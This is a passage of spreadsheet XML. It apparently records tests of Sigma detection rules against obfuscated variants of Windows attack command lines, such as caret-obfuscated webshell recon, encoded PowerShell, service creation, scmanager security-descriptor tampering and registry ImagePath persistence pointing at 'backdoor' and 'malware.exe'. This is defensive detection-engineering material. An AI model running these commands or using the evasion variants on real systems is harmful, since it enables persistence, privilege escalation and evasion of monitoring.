      <c r="G573" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H573" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I573" s="43" t="n"/>
      <c r="J573" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K573" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="574" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A574" s="43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</row>
    <row r="575" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A575" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B575" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssm_agent_abuse</t>
        </is>
      </c>
      <c r="C575" s="36" t="inlineStr">
        <is>
          <t>Potential Amazon SSM Agent Hijacking</t>
        </is>
      </c>
      <c r="D575" s="36" t="inlineStr">
        <is>
          <t>d20ee2f4-822c-4827-9e15-41500b1fff10</t>
        </is>
      </c>
      <c r="E575" s="36" t="n"/>
      <c r="F575" s="36" t="n"/>
      <c r="G575" s="36" t="n"/>
      <c r="H575" s="36" t="n"/>
      <c r="I575" s="36" t="n"/>
      <c r="J575" s="36" t="n"/>
      <c r="K575" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="576" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A576" s="43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</row>
    <row r="577" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A577" s="43" t="inlineStr">
        <is>
          <t>t1505.002</t>
        </is>
      </c>
      <c r="B577" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_msexchange_transport_agent</t>
        </is>
      </c>
      <c r="C577" s="36" t="inlineStr">
        <is>
          <t>MSExchange Transport Agent Installation</t>
        </is>
      </c>
      <c r="D577" s="36" t="inlineStr">
        <is>
          <t>83809e84-4475-4b69-bc3e-4aad8568612f</t>
        </is>
      </c>
      <c r="E577" s="36" t="n"/>
      <c r="F577" s="36" t="n"/>
      <c r="G577" s="36" t="n"/>
      <c r="H577" s="36" t="n"/>
      <c r="I577" s="36" t="n"/>
      <c r="J577" s="36" t="n"/>
      <c r="K577" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="578" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A578" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B578" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C578" s="36" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D578" s="36" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E578" s="36" t="inlineStr">
        <is>
          <t>control.exe C:\temp\System32\malicious.cpl</t>
        </is>
      </c>
      <c r="F578" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G578" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H578" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I578" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J578" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K578" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="579" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A579" s="43" t="n"/>
      <c r="B579" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C579" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D579" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E579" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F579" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G579" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H579" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I579" s="43" t="n"/>
      <c r="J579" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K579" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="580" ht="15.75" customHeight="1" s="42">
      <c r="A580" s="43" t="n"/>
      <c r="B580" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C580" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D580" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E580" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F580" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G580" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H580" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I580" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J580" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K580" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="581" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A581" s="43" t="n"/>
      <c r="B581" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C581" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D581" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E581" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F581" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G581" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H581" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I581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581" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K581" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="582" ht="15.75" customHeight="1" s="42">
      <c r="A582" s="43" t="n"/>
      <c r="B582" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C582" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D582" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E582" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eC JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F582" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G582" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H582" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I582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582" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K582" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="583" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A583" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B583" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C583" s="43" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D583" s="43" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E583" s="34" t="n"/>
      <c r="F583" s="43" t="n"/>
      <c r="G583" s="43" t="n"/>
      <c r="H583" s="43" t="n"/>
      <c r="I583" s="44" t="n"/>
      <c r="J583" s="43" t="n"/>
      <c r="K583" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="584" ht="15.75" customHeight="1" s="42">
      <c r="A584" s="44" t="n"/>
      <c r="B584" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_tool_recon</t>
        </is>
      </c>
      <c r="C584" s="43" t="inlineStr">
        <is>
          <t>Webshell Tool Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D584" s="43" t="inlineStr">
        <is>
          <t>f64e5c19-879c-4bae-b471-6d84c8339677</t>
        </is>
      </c>
      <c r="E584" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "p^y^t^h^o^n -h"</t>
        </is>
      </c>
      <c r="F584" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G584" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H584" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I584" s="44" t="n"/>
      <c r="J584" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K584" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="585" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A585" s="44" t="n"/>
      <c r="B585" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_tool_recon</t>
        </is>
      </c>
      <c r="C585" s="44" t="inlineStr">
        <is>
          <t>Webshell Tool Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D585" s="44" t="inlineStr">
        <is>
          <t>f64e5c19-879c-4bae-b471-6d84c8339677</t>
        </is>
      </c>
      <c r="E585" s="44" t="inlineStr">
        <is>
          <t>python  -h</t>
        </is>
      </c>
      <c r="F585" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G585" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H585" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I585" s="44" t="n"/>
      <c r="J585" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K585" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="586" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A586" s="43" t="n"/>
      <c r="B586" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_tool_recon</t>
        </is>
      </c>
      <c r="C586" s="43" t="inlineStr">
        <is>
          <t>Webshell Tool Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D586" s="43" t="inlineStr">
        <is>
          <t>f64e5c19-879c-4bae-b471-6d84c8339677</t>
        </is>
      </c>
      <c r="E586" s="44" t="inlineStr">
        <is>
          <t>python -V</t>
        </is>
      </c>
      <c r="F586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I586" s="44" t="n"/>
      <c r="J586" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K586" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="587" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A587" s="44" t="n"/>
      <c r="B587" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_tool_recon</t>
        </is>
      </c>
      <c r="C587" s="44" t="inlineStr">
        <is>
          <t>Webshell Tool Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D587" s="44" t="inlineStr">
        <is>
          <t>f64e5c19-879c-4bae-b471-6d84c8339677</t>
        </is>
      </c>
      <c r="E587" s="44" t="inlineStr">
        <is>
          <t>python.exe -h</t>
        </is>
      </c>
      <c r="F587" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G587" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H587" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I587" s="44" t="n"/>
      <c r="J587" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K587" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="588" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A588" s="44" t="inlineStr">
        <is>
          <t>t1505.004</t>
        </is>
      </c>
      <c r="B588" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_susp_module_registration</t>
        </is>
      </c>
      <c r="C588" s="43" t="inlineStr">
        <is>
          <t>Suspicious IIS Module Registration</t>
        </is>
      </c>
      <c r="D588" s="43" t="inlineStr">
        <is>
          <t>043c4b8b-3a54-4780-9682-081cb6b8185c</t>
        </is>
      </c>
      <c r="E588" s="44" t="n"/>
      <c r="F588" s="44" t="n"/>
      <c r="G588" s="44" t="n"/>
      <c r="H588" s="44" t="n"/>
      <c r="I588" s="44" t="n"/>
      <c r="J588" s="44" t="n"/>
      <c r="K588" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="589" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A589" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B589" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C589" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D589" s="43" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E589" s="44" t="n"/>
      <c r="F589" s="44" t="n"/>
      <c r="G589" s="44" t="n"/>
      <c r="H589" s="44" t="n"/>
      <c r="I589" s="44" t="n"/>
      <c r="J589" s="44" t="n"/>
      <c r="K589" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="590" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A590" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B590" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C590" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D590" s="43" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E590" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c New-Service -Name svcHighPriv -BinaryPath""Name 'C:\windows\system32\cmd.exe' -StartupType Manual</t>
        </is>
      </c>
      <c r="F590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I590" s="44" t="n"/>
      <c r="J590" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K590" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="591" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A591" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B591" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C591" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D591" s="44" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E591" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; 'New-Service' -Name svcHighPriv -BinaryPathName 'C:\windows\system32\cmd.exe'"</t>
        </is>
      </c>
      <c r="F591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G591" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H591" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I591" s="44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591" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K591" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="592" ht="15.75" customHeight="1" s="42">
      <c r="A592" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B592" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C592" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D592" s="43" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E592" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c New-Service -Name svcHighPriv -Bin 'C:\windows\system32\cmd.exe' -StartupType Manual</t>
        </is>
      </c>
      <c r="F592" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G592" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H592" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I592" s="44" t="n"/>
      <c r="J592" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K592" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="593" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A593" s="44" t="n"/>
      <c r="B593" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_service_dacl_modification_set_service</t>
        </is>
      </c>
      <c r="C593" s="43" t="inlineStr">
        <is>
          <t>Suspicious Service DACL Modification Via Set-Service Cmdlet</t>
        </is>
      </c>
      <c r="D593" s="43" t="inlineStr">
        <is>
          <t>a95b9b42-1308-4735-a1af-abb1c5e6f5ac</t>
        </is>
      </c>
      <c r="E593" s="44" t="n"/>
      <c r="F593" s="44" t="n"/>
      <c r="G593" s="44" t="n"/>
      <c r="H593" s="44" t="n"/>
      <c r="I593" s="44" t="n"/>
      <c r="J593" s="44" t="n"/>
      <c r="K593" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="594" ht="15.75" customHeight="1" s="42">
      <c r="A594" s="44" t="n"/>
      <c r="B594" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C594" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D594" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E594" s="44" t="n"/>
      <c r="F594" s="44" t="n"/>
      <c r="G594" s="44" t="n"/>
      <c r="H594" s="44" t="n"/>
      <c r="I594" s="44" t="n"/>
      <c r="J594" s="44" t="n"/>
      <c r="K594" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="595" ht="15.75" customHeight="1" s="42">
      <c r="A595" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B595" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C595" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D595" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E595" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe c^re^ate AtomicService bi^nPath= "C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F595" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G595" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H595" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I595" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J595" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K595" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="596" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A596" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B596" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C596" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D596" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E596" s="44" t="inlineStr">
        <is>
          <t>sc.exe "create" AtomicService "binPath"= "C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F596" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G596" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H596" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I596" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J596" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K596" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="597" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A597" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B597" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C597" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D597" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E597" s="44" t="inlineStr">
        <is>
          <t>sc.exe create AtomicService binPath^= "C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F597" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G597" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H597" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I597" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J597" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K597" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="598" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A598" s="44" t="n"/>
      <c r="B598" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_allow_service_changes</t>
        </is>
      </c>
      <c r="C598" s="44" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D598" s="44" t="inlineStr">
        <is>
          <t>6c8fbee5-dee8-49bc-851d-c3142d02aa47</t>
        </is>
      </c>
      <c r="E598" s="44" t="n"/>
      <c r="F598" s="44" t="n"/>
      <c r="G598" s="44" t="n"/>
      <c r="H598" s="44" t="n"/>
      <c r="I598" s="44" t="n"/>
      <c r="J598" s="44" t="n"/>
      <c r="K598" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="599" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A599" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B599" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_allow_service_changes</t>
        </is>
      </c>
      <c r="C599" s="43" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D599" s="43" t="inlineStr">
        <is>
          <t>6c8fbee5-dee8-49bc-851d-c3142d02aa47</t>
        </is>
      </c>
      <c r="E599" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe s^d^s^e^t scmanager D:(A;;KA;;;WD)</t>
        </is>
      </c>
      <c r="F599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G599" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H599" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I599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599" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K599" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="600" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A600" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B600" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_allow_service_changes</t>
        </is>
      </c>
      <c r="C600" s="43" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D600" s="43" t="inlineStr">
        <is>
          <t>6c8fbee5-dee8-49bc-851d-c3142d02aa47</t>
        </is>
      </c>
      <c r="E600" s="44" t="inlineStr">
        <is>
          <t>sc.exe "sdset" scmanager D:(A;;KA;;;S-1-1-0)</t>
        </is>
      </c>
      <c r="F600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H600" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I600" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J600" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K600" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="601" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A601" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B601" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_allow_service_changes</t>
        </is>
      </c>
      <c r="C601" s="43" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D601" s="43" t="inlineStr">
        <is>
          <t>6c8fbee5-dee8-49bc-851d-c3142d02aa47</t>
        </is>
      </c>
      <c r="E601" s="44" t="inlineStr">
        <is>
          <t>sc.exe sdset scmanager "D:(A;;KA;;;WD)"</t>
        </is>
      </c>
      <c r="F601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G601" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H601" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I601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601" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K601" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="602" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A602" s="44" t="n"/>
      <c r="B602" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_service_tamper_for_persistence</t>
        </is>
      </c>
      <c r="C602" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Existing Service Tampering</t>
        </is>
      </c>
      <c r="D602" s="44" t="inlineStr">
        <is>
          <t>38879043-7e1e-47a9-8d46-6bec88e201df</t>
        </is>
      </c>
      <c r="E602" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\ExampleService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\backdoor" /f</t>
        </is>
      </c>
      <c r="F602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I602" s="44" t="n"/>
      <c r="J602" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K602" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="603" ht="15.75" customHeight="1" s="42">
      <c r="A603" s="43" t="n"/>
      <c r="B603" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C603" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D603" s="43" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E603" s="44" t="inlineStr">
        <is>
          <t>reg add "HKLM\System\CurrentControlSet\Services\MaliciousService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Public\malware.exe" /f</t>
        </is>
      </c>
      <c r="F603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H603" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I603" s="44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J603" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K603" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="604" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A604" s="43" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B604" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_execution</t>
        </is>
      </c>
      <c r="C604" s="43" t="inlineStr">
        <is>
          <t>Change Default File Association Via Assoc</t>
        </is>
      </c>
      <c r="D604" s="43" t="inlineStr">
        <is>
          <t>3d3aa6cd-6272-44d6-8afc-7e88dfef7061</t>
        </is>
      </c>
      <c r="E604" s="44" t="n"/>
      <c r="F604" s="44" t="n"/>
      <c r="G604" s="44" t="n"/>
      <c r="H604" s="44" t="n"/>
      <c r="I604" s="44" t="n"/>
      <c r="J604" s="44" t="n"/>
      <c r="K604" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="605" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A605" s="44" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B605" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_execution</t>
        </is>
      </c>
      <c r="C605" s="44" t="inlineStr">
        <is>
          <t>Change Default File Association Via Assoc</t>
        </is>
      </c>
      <c r="D605" s="44" t="inlineStr">
        <is>
          <t>3d3aa6cd-6272-44d6-8afc-7e88dfef7061</t>
        </is>
      </c>
      <c r="E605" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "as""soc .hta=txtfile"</t>
        </is>
      </c>
      <c r="F605" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G605" s="44" t="b">
        <v>0</v>
      </c>
